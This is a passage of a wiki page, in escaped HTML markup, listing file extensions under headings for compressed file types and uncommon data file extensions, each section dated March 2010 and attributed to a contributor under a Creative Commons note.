.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
